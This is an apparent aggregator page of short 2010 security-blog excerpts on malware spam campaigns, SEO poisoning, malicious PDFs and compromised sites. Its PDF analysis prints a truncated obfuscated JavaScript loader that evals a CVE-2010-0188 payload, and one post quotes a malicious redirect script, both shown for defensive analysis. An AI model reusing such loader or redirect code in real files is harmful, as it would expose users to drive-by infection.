Computer Security Articles

Trend Micro researchers recently discovered attacks on the social networking site Multiply. The cybercriminals behind the said attack created new Multiply user accounts then sent malicious personal messages to other site users.

The personal message contains a greeting with the target’s Multiply user name and a video that the recipient is supposed to watch. Clicking the play button redirects users to the malicious URL http://yourtube.{BLOCKED}loring.com/video2/video.php?q=1289224873.

The page then asks the recipient to download a codec to view the video.

These sorts of attacks have been occurring for some time.  Users should avoid downloading new codecs to watch videos posted online, as these are frequently malicious. Trend Micro detects the downloaded file in this attack as TROJ_KATUSHA.F. In addition the URL where the malicious video is located is already blocked by Trend Micro products.

– Gerald Dillera (Fraud Analyst) on TrendLabs | Malware Blog – by Trend Micro

Ever noticed a magnifying glass next to your Google search results lately?  It is actually a new service that Google launched last week called Instant Previews.  This service allows users to see what a page looks like before going to it by hovering or clicking the magnifying glass next to the Google search results. 

Simple?  Yes.  Secure?  Not so much.  Our research shows that the images shown in Instant Previews is not updated as frequently as anyone might assume.  Therefore, we don't think this feature would help users as much in making an informed decision on judging whether a link is indeed malicious or not.  On the other hand, Websense customers are protected from this attack by our ACE real-time analytics.     

We reported some Black Hat SEO'd websites from searches relating to Prince William's engagement yesterday.  Using Google's Instant Preview on the malicious search results may lead users into believing that  the links they're clicking on is actually safe when in fact it's not. 

Take the picture above for example.  Instant Preview returns a very legitimate looking page, complete with pictures and relevant words.  To unsuspecting eyes, it looks clean.  Of course, when the user clicks the link, they will be redirected to the fake Firefox Update page.  This tactic is also evident on Black Friday related search results.

Other variations of images used by malware pushers in Instant Previews are the usual standard Google Search Page and a very simple "Preview not available."

– Mary Grace Timcang on Security Labs

View full post on Web Security Weblog

Another trick that is becoming more and more common in malicious PDF
files consists of storing the actual malicious content (for example,
JavaScript code that exploits some vulnerability) into XFA forms. If you
remember the
getPageNthWord,
getAnnots,
and the
info
tricks that have been documented earlier, you will recognize the
technique been used here.

So, what is an XFA form? XFA stands for XML Forms Architecture and it is
a specification used to create form templates (forms that can
be filled in by a user) and to process them (for example, validate their
contents). Support for XFA forms in PDF files has been introduced by
Adobe with PDF 1.5. If you want to know all the gory details, you can
refer to the original XFA
proposal or to the Adobe’s
XFA
specification,
which, however, being 1123-page long may be a hard read.

Let’s see how it used abused in practice (the MD5 of the sample I’m
analyzing is 1f26dcd4520a6965a42cefa4c7641334).
The PDF first defines an XFA template, which is used to describe the
appearance and interactive characteristics of the form.

obj 10 0
<<
    /Type /EmbeddedFile
    /Length 618
    /Filter /FlateDecode
>>
stream
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
    <subform layout="tb" locale="en_US" name="artsLei">
        <pageSet>
            <pageArea id="leiArts" name="leiArts">
                <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
                <medium long="792pt" short="612pt" stock="default"/>
            </pageArea>
        </pageSet>
        <subform h="756pt" w="576pt " name="docTaut">
            <field h="65mm" name="docArts" w="85mm" x="53.6501mm" y="88.649 9mm">
                <event activity="initialize" name="tautDoc">
                    <script contentType="application/x-javascript">
                    var nil = (function(){return this;}).call(null);
                    ...
                    eval_ref(decode(docArts[\\'ra\\'+ue+\\'wVa\\'+ue+\\' lue\\'].substring(50),eval_ref));
                    </script>
                </event>
                <ui><imageEdit/></ui>
            </field>
        </subform>
    </subform>
</template>
endstream
endobj

A couple of interesting parts: the template defines a field, named
docArts. Note that a reference to this field will be available through
an object named docArts in the global scope of JavaScript (i.e.,
this.docArts is a Field object that represents this field).
The field also has an event handler to handle its initialization. The
handler is written in JavaScript and has the familiar aspect of
obfuscated code.

Let’s see what this code does:

var nil = (function(){return this;}).call(null);
var eval_ref = nil['eval'];
function decode(str, ev){
    var ret = '';
    var cvc = [];
    var fcc = String.fromCharCode;
    var k = docArts['rawValue'].substring(0, 50);
    ...
    return ret;
}
eval_ref(decode(docArts['rawValue'].substring(50), eval_ref));

The interesting bits here are the references to the docArts object.
Notice that its rawValue property is retrieved. So, where is the value
of the field stored? In an XFA dataset:

obj 12 0
<<
    /Filter /FlateDecode
    /Length 3388
    /Type /EmbeddedFile
>>
stream
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
    <xfa:data>
        <artsLei>
            <docArts>
            [[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]]
            [80,87,70,83,71,77,80,88,16,
             ...
            78,66,74,79,21,86,79,68,8,9,59]
            </docArts>
        </artsLei>
    </xfa:data>
</xfa:datasets>
endstream
endobj

Therefore, the obfuscated JavaScript extracts the data stored for the
docArts field (precisely, all the content after the initial 50
characters) and passes it for decoding to the decoding routine. The
decoding routine also uses the docArts data (the first 50 characters) to
retrieve the malicious code in the clear, which is ready to be evaluated.
The execution finally results with an exploitation of the CVE-2010-0188
vulnerability
(libTiff overflow).

View full post on Marco’s Blog

For those of you who are fans of the various challenges, the Honeynet Project has released challenge 6 in their 2010 forensics series.
PDF format is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is functionality that has been built into many exploit kits. As users are less cautious opening PDF files, the malicious PDF file has become quite a successful attack vector. [1]
[1] http://honeynet.org/challenges/2010_6_malicious_pdf
———–
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

View full post on SANS Internet Storm Center, InfoCON: green

We have seen a couple of instances of search result poisoning for election related search terms. Right now, this is not wide spread but of course depends largely on the search terms you use.
One affected domain appears to be digicube.biz and malicious results are already blocked on Google. The malicious results use the search term as part of the URL, probably in an attempt to achieve a higher ranking (we have seen this before).
For example for the search term 2010 election results, you may get:
digicube.biz/…./news=2010-election-results (parts removed to protect our readers)
At this point, these links do not show up very high in Google’s ranking for these search results. If you find more polluted search terms, please let us know. Websense published a blog post with a few more details and search terms [1].
[1] http://community.websense.com/blogs/securitylabs/archive/2010/11/01/rogue-av-rides-the-US-midterm-elections-wave.aspx
——

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

View full post on SANS Internet Storm Center, InfoCON: green

I wonder how much longer rogue AV will ride the wave of major news?  Having recently blogged about Rogue AV riding the US Midterm Elections wave, we spotted further activity on what appeared to be blank pages from the Black Hat SEO we noticed yesterday.  Websense customers are continually being protected against this attack through our Advanced Classification Engine.

In line with what we noticed previously, these blank pages were being prepared for what we can only assume is a major assault today, being election day itself.  This particular attack is browser-aware, as the threats are specific to the browser being used.   

Using the same source as yesterday's Black Hat SEO campaign, the links within the page are now fully primed to become active and ready to serve the malicious content.  The main differences from what we noticed in the previous attack are that no URL is provided in the "script : if (navigator:userAgent.indexOf("MSIE")<0)var url= "http:" part, and in addition the parking page is now active. However, when the link is clicked, the user is still not redirected to the intended malicious site.

Let's start off with the first of the malicious candidates in the rogue AV election Adobe Flash update.  This is specific to Internet Explorer 8, and when the link is activated, the unsuspecting user gets a prompt to install fake Macromedia Flash Components, claiming this is required to view the web site.

The second malicious component, which masquerades as a Firefox update message, is – as can be guessed – specific to Firefox browser users.

As shown above, the user again gets prompted to update Flash player, but this time specific to Firefox.

With all other browsers, we notice it just redirects to the same site for the rogue AV download page we noticed yesterday.

As of the time of writing and publishing this blog, the coverage for the file download prompts for both IE Flash Update and Firefox Flash update was about 27.9% as confirmed by VirusTotal.

View full post on Security Labs

Clicking links without thinking is always a bad idea, but some links are more likely than others to be dangerous. McAfee has mapped the prevalence of bad links in different top-level domains and come up with a risk-level map of the world.

View full post on PCMag.com Security Coverage

Previously, we discussed the “Here You Have” mail attack and the associated malware, WORM_MEYLME.B. Today, let’s look into the backdoor payload, BKDR_BIFROSE.SMU.

The “Here You Have” payload: A powerful backdoor

Not all backdoor applications are created equal. As such, it can be said that the cybercriminals behind WORM_MEYLE.B deliberately opted to use a BIFROSE backdoor program for several reasons. In our simulated environment, we saw that an attacker can use a BIFROSE variant to transfer files to and from an infected system, delete files, terminate processes, and steal sensitive information off an infected system such as the computer name; lists of active users, processes, and windows; and serial keys, among others. It can also access and modify registry information, log and retrieve keystrokes, create a remote shell, and issue commands that the infected user’s shell can offer, and routinely capture and retrieve images of an affected user’s screen.

WORM_MEYLME authors used the downloaded backdoor to do most of its dirty work. Upon execution, the backdoor will connect to its command-and-control server at {BLOCKED}inziad.no-up.biz. Upon a successful connection to this server, attackers can now retrieve the passwords stolen earlier. That’s only for starters; by maximizing all the features offered by the BIFROSE backdoor an attacker could cause serious damage.

A Cybercriminal’s Threat: “I could smash all those infected”

Not long after the spam outbreak ensued, someone claiming to be responsible for the “Here you have” campaign posted a video on YouTube. In this video, the author claimed that he could have placed a more destructive payload but instead decided to use a stealthier technique with a backdoor application. The author also stated that he could have “smashed all those infected (systems),” as evidenced by the capabilities that BIFROSE exhibits. Lending credibility to the author’s statement, users are advised to keep their antivirus software up-to-date to help mitigate similar threats.

The Big Picture of the MEYLME Attack

In hindsight, the cybercriminals behind the “Here you have” spam campaign’s primary intent was not to create another botnet or an army of zombie computers. Instead, the incident was a good example of a typical hacking attack. It shows that with simple social engineering tactics, cybercriminals can easily compromise users’ systems in targeted organizations.

Once a system has been affected by MEYLME, various malicious routines are performed: anti-virus services are disabled, more components are downloaded, passwords and other sensitive information are stolen, the worm propagates either within or beyond the organization, the BIFROSE backdoor is installed, and even more sensitive information is stolen.

One more thing should be noted as well. BIFROSE has screen capture capabilities, which means that organizations with dedicated or proprietary systems or software that encrypt files or keystrokes are still not safe. The attacker might as well be shoulder surfing and watching the user’s every move.

Simply put, WORM_MEYLME.B was a key player in a noteworthy attack that utilized an effective social engineering technique. Once a targeted organization’s HR management systems are compromised or, worse, if the majority of the users across its network fall into the same trap, there is no telling how much information can fall into the hands of cybercriminals.

View full post on TrendLabs | Malware Blog – by Trend Micro

“Memory-scrapping malware is malicious software designed to examine memory of sensitive processes and extract data that would otherwise be unavailable in persistent storage.”

– Slightly paraphrasing Anand Sastry’s definition from his article on credit card data compromises via memory-scraping malware.

View full post on Lenny Zeltser on Information Security

In a posting yesterday on Adobe Reader X I noted that, due to increased security vigilance on Adobe’s part, PDF files were no longer the leading vehicle for software exploit-driven malware. That dishonor belongs to Sun’s Oracle’s Java.

Others took notice of the same phenomenon. A blog entry from Microsoft’s Malware Protection Center includes a graph which shows the extent of it: PDF exploits are flat, probably declining, and Java exploits are skyrocketing.

I don’t have hard data myself, but I suspect (hope?) that the reason is partly what made Reader into such an inviting target 2 or 3 years ago: large numbers of clients with old, unpatched versions of Java on their systems. In fact, due to the way Java worked until not too long ago, users may have several copies of it, each quite old, containing numerous exploitable vulnerabilities and individually callable by malware run by the user.

And exploit writers have great tools at their disposable. Metasploit has a Java Meterpreter which allows exploits written in Java. It works fine on Windows and Linux.

Want to see the Java Meterpreter in action?

Metasploit JAVA Meterpreter from NightRanger on Vimeo.

View full post on Security Watch

In early September, the “Here You Have” wave of spammed messages hit users’ inboxes, which was discussed in the following Malware Blog posts:

• Old Malware Out of Its Shell
• From Alicia to Africa to Anywhere Else: Possible Origin of the “Here You Have” Spam Campaign

At that time, the attention focused on the spam. However, it is also wise to understand the capabilities of WORM_MEYLME.B, the main malware component used in this spam campaign.

The WORM_MEYLME.B binary contains login information to certain Gmail accounts that have since been terminated, which helped us connect the dots that made up the entire spam campaign.

WORM_MEYLME.B’s Malicious Routine

We have since the attack slowly uncovered WORM_MEYLME.B’s real intention. From one central location, it downloads various programs that, while not exactly malicious, can be used for malicious attacks. It uses the files it downloads for three major routines:

• The worm attempts to infect an affected user’s entire network the same way ILOMO malware did. It uses the psexec.exe file it downloads to propagate throughout a network. As was seen with TROJ_ILOMO variants, this proved to be an effective technique that IT administrators who intentionally use psexec should be wary of. The screenshot below shows how PsExec is renamed to re.exe and is used.
  

• WORM_MEYLME.B uses password-stealing tools, runs these, and creates c:\WINDOWS\*.dlm files that contain affected users’ login information. These credentials are typically stored by popular instant-messaging applications and Web browsers like Internet Explorer, Firefox, Opera, and Chrome. The stolen user credentials are then sent to a remote malicious user.
  

• WORM_MEYLME.B installs a very powerful backdoor application in the form of a BIFROSE variant. The cybercriminals behind this attack may have opted to use a BIFROSE variant because of its widespread reach and easy-to-use features. In the course of our analysis, we used a compatible BIFROSE command-and-control server to simulate the communication between BKDR_BIFROSE.SMU and the infected machine. BKDR_BIFROSE.SMU is the actual backdoor component WORM_MEYLME.B was intentionally programmed to install into infected systems. As shown in the screenshot below, at this point in the infection chain, the user’s system has now been fully compromised and left at the mercy of the cybercriminals behind the attack.
  

The “Here You Have” Outbreak Itself

The “Here you have” spam campaign was indeed a targeted attack. It appears that it initially targeted human resource (HR) personnel of government offices such as the African Union and the NATO. However, due to its classic but effective propagation routine, things got out of hand and caused a worldwide outbreak instead.

The worm’s mass-mailing routine sent “Here you have” spam to email addresses that can be found in the affected users’ lists of contacts. “Just for you” spam, on the other hand, were sent out to email addresses that were found in the affected users’ Yahoo! Messenger (YM) message archives. These email propagation routines, along with network propagation routines and other routines offered by VBS_MEYLME.B, allowed the attack to spread much more widely than to just the HR personnel of the originally targeted government offices.

Whoever was behind this attack might have assumed that the targets were not fully aware of their companies’ security practices and could possibly be using YM’s message-archiving feature.

In the following chart, we can see the scale of the spam outbreak that WORM_MEYLME.B caused:

Thanks to the Trend Micro™ Smart Protection Network™’s global threat intelligence correlation feature, related malicious URLs and files were easily identified as part of the WORM_MEYLME.B spam outbreak. The intelligence correlation data enabled Trend Micro to quickly release reputation service solutions such as spam and URL blocking and Smart Scan to protect its product users. Users are then reassured of protection from further WORM_MEYLME.B- and BKDR_BIFROSE.SMU-related attacks that may threaten to infiltrate their private lives and networks and, in some cases, even to take hold of their computers.

In Part 2, we discuss the backdoor payload of the attack, BKDR_BIFROSE.SMU.

View full post on TrendLabs | Malware Blog – by Trend Micro

Last week, I presented at VB2010 a talk that was well received in the room and on the wires. A number of people have requested copies of or links to my presentation and paper (thanks to Helen Martin of Virus Bulletin for permission). Reading presentations without the commentary is difficult and so I will expand on a few slides here.

In the presentation I give 5 heuristics for detection and/or more in-depth parsing:

• Heuristic 1: If the PDF contains JavaScript look more closely
• Heuristic 2: If the objects or streams are mismatched look more closely
• Heuristic 3: If the Cross-Reference (XRef) Table is invalid look more closely
• Heuristic 4: The presence of LZWDecode, ASCII85Decode, DCTDecode and Encrypt Filter are indictative of clean files
• Heuristic 5: Hash (#) encoded tags are indictative of malicious files

Heuristic 1

For my paper I gathered a corpus of ~130 000 PDF file. Of which half were malicious. Scanning the corpus for the tag /JavaScript gave the following results:

For the presentation I gathered a larger corpus (concentrating on files with JavaScript) and that gave:

In the two corpuses the definition of malicious differs – the first overly agreesive and the second less so however, it appears that:-

“While JavaScript is not neccessary for maliciousness it is not neccessary for the majority of clean files.”

Heuristic 1: If the PDF contains JavaScript look more closely

Heuristic 2

Within PDF files you have indirect objects and they are of the form N R obj (where N is the object number and R is the revision number). Each indirect object is associated with a tag endobj. Within indirect objects you can have stored binary data in a stream tag. Each stream is associated with an endstream tag.

Within the first corpus we see:

The second corpus shows:

“Because the PDFs are those reported to SophosLabs some of them are actually corrupt. Writing a parser to know when the files are maliciously corrput is non-trivial”

Heuristic 2: If the objects or streams are mismatched look more closely

Heuristic 3

There are two main ways of parsing a PDF file:

• Use the Cross Reference (XRef) Table which points to the position of each object and build the tree
• Brute force the file. Scan for starting and ending object tags and build the tree

Over the first corpus I attempt to validate the XRef table:

“It appears that readers and parsers must use both methods”

Heuristic 3: If the Cross-Reference (XRef) Table is invalid look more closely

Heuristic 4

Binary data within streams can be stored in various Filters (Adobe parlance for compression methods). Scanning the first corpus for different types of data shows the following prevelence :

Over the second corpus we see slightly different results:

“LZWDecode is suggestive of older PDFs and DCTDecode is used to store certain graphics”

Heuristic 4: The presence of LZWDecode, ASCII85Decode, DCTDecode and Encrypt Filter are indictative of clean files

Heuristic 5

The standard allows for Fonts names to have non-ASCII characters in them to do this the non-ASCII are encoded via hash encoding i.e. #61 the hash followed by the hexidecimal number 61 (ASCII ‘a’). Scanning the corpus for Filters that use hash encoding gives:

“When I rescanned the 257 file with later data they are all malicious”

Heuristic 5: Hash (#) encoded tags are indictative of malicious files

Conclusions

Adobe have done a great deal of work to try and fix the problems of malicious PDFs: changed the update frequency of their products; changed the update mechanisms; and joined MAPP. Even so, there are still things they could improve:

• Conclusion 1: Remove JavaScript from the defaults
• Conclusion 2: Only run signed external and internal code
• Conclusion 3: Implement strict parsing modes in reader (esp. browser plugins)
• Conclusion 4: Redesign PDF
• Conclusion 5: Flying Wallendas

Conclusion 1

Heuristic 1 suggests that JavaScript isn’t that common and so lightweight readers shouldn’t implement it, especially, browser plugins.

Conclusion 2

If running code (via JavaScript or Flash) it should be signed so you can have some level of trust. This isn’t a fail-safe method but it helps.

Conclusion 3

Having readers by default warning when trying to open corrupt files would be a help. Browser plugins should even try to.

Conclusion 4

Redesigning PDF has already begun, and PDF/A is actually a good start. History has shown, that the problems with Microsoft Office macros went away with newer versions because of a redesign.

Conclusion 5

PDF Reader is being redesigned to have a sandbox but care must be taken not to allow sloppy code that relies on the sandbox to catch errors.

I finished the presentation by stating:

This house believes that PDF as a file format is no longer fit for purpose and that a new SDF (Safe Document Format) should take its place.

Of the ~200 people in the room ~75% agreed with the statement and ~3% disagreed.

My colleague Mike Wood – who also presented at VB2010 – joined Chet and me in a podcast.

View full post on SophosLabs blog

People and organizations disagree on what is malware. The exact definition has been the subject of many discussions. Before attempting to define malware, we must acknowledge that differences in individuals’ experiences and priorities will lead them to define malware differently.

NIST Guide to Malware Incident Prevention and Handling, SP 800-83, provides a good definition:

“Malware, also known as malicious code and malicious software, refers to a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or otherwise annoying or disrupting the victim.”

This definition feels right to me, yet it is a bit too lengthy. I propose a simpler definition, which is compatible with that of NIST:

Malware is code that is used to perform malicious actions.

In this case, the word “malicious” in the definition follows the standard English definition: actions characterized by malice.

My definition implies that whether a program is malware depends not so much on its capabilities but, instead, on how the attacker uses it. Attackers benefit from malware at the victim’s expense. Behind malicious software there is usually some human or organization that is making use of its capabilities for malicious purposes.

Thanks to Michael Murr and the good folks on Twitter who provided feedback on my attempts to define malware.

— Lenny Zeltser

View full post on Lenny Zeltser on Information Security

The malicious LinkedIn spam campaigns of the last few days are continuing in force.  The source is the Pushdo botnet, which is back in full force following disruption to its operations last month.  The campaigns mimic a LinkedIn update notification.   Here is a sample from today: The malicious web page displays code that includes [...]

View full post on M86 Security Labs Blog

MX Lab, http://www.mxlab.eu, reported earlier on regarding a malicious spam campaign regarding an offer to get Skype VOIP Addons.

We have been following the campaigns and what is quite stunning is that the authors of this campaign are using different ESPs – or Email Service Providers – in order to get the message to their subscription database.

In the past we’ve seen messages coming from:

• Emailsparkle.com – owned by Dotster
• digioffice-mail.be – owned by Mario Vleugels from West Technologies, located in Belgium
• createsend1.com – owned by  Campaign Monitor

Today we have the messages coming from Stream Send and the senders email address is newsletter@skype–2010.com. As you can notice, a new domain name is also present. This is used to avoid spam engines with the intent analysis technology where filtering is based on URLs inside the message.

The body of the email:

Dear Skype Users,

This is to notify that new updates have been released for Skype. Following are major new features:

- Talk more for free via Voice Over IP (VoIP)
- Lower cost when connecting to landlines (much cheaper than Calling Card)
- Record your conversation (better than telephone quality)
- Instant messaging & file-sharing, video calls
- Now available on PSP!

To check and upgrade, go to Skype Updates Center

Skype has changed the way we think of telecommunications.

Thank you for choosing us.

With best regards,
Mike Pickman
Skype Support
Copyrights Skype 2010 – All Rights Reserved

If you notice a change in email delivery, please post it in the comments.

View full post on mxlab – all about anti virus and anti spam

It seems that even while on vacation one cannot really get away from malware encounters. Whilst browsing the PirateBay’s website, I noticed the little Java icon showing up in the task bar: That usually means some JavaScript code is running… users of No-Script will know that this can be trouble… In the browser, a file [...]

View full post on Malware Diaries

A new law makes it illegal in California to maliciously impersonate someone online.

View full post on Computerworld Security News

MX Lab, http://www.mxlab.eu, is intercepting an certain amount of emails with the subject “LinkedIn Alert” that leads to a website with malicious software and redirects surfers to a online pharmacy web site.

The message looks quite well and has the branding of LinkedIn done quite well. All the URLs have been modified to direct the reader to a first web site. In this case we had hxxp://portalgamm.com.br/1.html but the domains change quite rapidly.

When visiting this web site we got the following HTML code:

PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=hxxp://medicineni.com" />

The website borlakas.info contains the following Javascript:

<script>
if (navigator.javaEnabled()) {
var metka = '2';
}
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
if (!frames.navigator['taintE' + 'nabled']()) {
var metka = '1';
}
location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
</script>

<script>
 if (navigator.javaEnabled()) {		var metka = '2';	}
 location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');

if (!frames.navigator['taintE' + 'nabled']()) {		var metka = '1';	}

location.href = ('http://borlakas.info/asdfasgs/rotator.php?unique=' + metka + '');
 </script>

After 4 seconds you are redirected to an online pharmacy web site

During our anaylis of some messages we could notice that the authors of this campaign use valid domains of real company web sites.

We found an URL to a political party in Belgium: Vlaams Belang. So  it seems that someone got access to drop the file 1.html on the server of Vlaams Belang. The URL is hxxp://www.vlaamsbelang.org/1.html and the visitor is redirected to hxxp://www.vlaamsbelang.org/1.html.

MX Lab did made an effort to contact Vlaams Belang to notify them of the exploit on their web site but it is clear that several other web sites are also affected.

View full post on mxlab – all about anti virus and anti spam

The title says it all…

This is a document I shared with my Brucon workshop attendees.

I know, this is a PDF document, you’ve to appreciate the irony

View full post on Didier Stevens

A demonstration of a couple of ways that the McAfee Web Gateway can protect you from bad web site behavior like cross-site request forging through an IFRAME injection, and JavaScript malware injections. Using Proactive Scanning in the Anti-malware engine along with the full McAfee Antivirus and TrustedSource URL Categorization and Reputation, the McAfee Web Gateway offers the absolute best protection you can have against the threats on the web today.

Symantec has observed an increase in the volume of email spam with HTML attachments that contain malicious JavaScript.

In the last couple weeks, spammers masquerading as known individuals or companies sent email invitations or business notifications. The message entices recipients to open an HTML attachment.

Users who open the attachment will be redirected to a common meds spam website. You may think it’s a typical spammer tactic to send the victim to a med promo site after an attachment is opened. However, this page has been scripted with a malicious threat. Symantec has detected this threat as Trojan.Malscript!html.

Here are some sample subject lines that have been observed:

Subject: Shipping Notification

Subject: You're invited to view my photos!

Subject:  <Details Removed> – Payment Charged

Subject: Rejected <Details Removed> transaction, please review the transaction report

Subject:  Wing <Details Removed> 32 Program

This week, the spammers varied the subject lines and the message content by using current and noteworthy events to lure innocent readers:

Subject:  Cops kill active shooter at Johns Hopkins Hospital

Subject: Jackie Evancho and Sarah Brightman

Subject:  America's Got Talent

Subject:  Jackie Evancho and Sarah Brightman

Subject:  Church of Body Modification

Subject:  NFL Picks Week 2

Subject:  Daniel Covington die

In the second message, the spammers capitalize on a recent murder-suicide incident at Johns Hopkins Hospital.

If a user is enticed to open the HTML attachment, a phony Windows security alert will pop up. Symantec cautions recipients to be vigilant and not proceed with the fake antivirus/spyware protection download procedure which is actually a malicious attack.

My thanks to blog contributor Hitomi Lin.

View full post on Symantec Connect – Security Response – Blog Entries

Every now and then we look for song lyrics on the Internet. Using the newest Google Instant technology we immediately find what we need. At least, we think so.

Websense Security Labs™ ThreatSeeker™ Network has detected that the popular site Songlyrics.com (with approximately 200,000 daily page views and 2,000,000 unique visitors) is compromised and injected with obfuscated malicious code.
Websense customers are proactively protected against the malicious code by our  Advanced Classification Engine – ACE

Once a user accesses the main page of the song lyrics site, injected code redirects to an exploit site loaded with the Crimepack exploit kit.
Attempted exploits result in a malicious binary (VT 39.5%) file that's run on the victim's computer. Once infected, the machine becomes another zombie-bot in the wild.

Deobfuscating this code reveals a redirection to the malicious payload site:

It is interesting to note that the malicious code injected on Songlyrics.com uses a similar obfuscation algorithm as Crimepack – a prepackaged commercial software used by attackers to deliver malicious Web-based code.

It appears that the majority of pages served by Songlyrics.com are compromised.

Crimepack has become one of the best selling exploit packs on the market due to its huge number of pre-compiled exploits offering a great base for the "drive-by-download & execute" business implication.

View full post on Security Labs

View full post on Web Security Weblog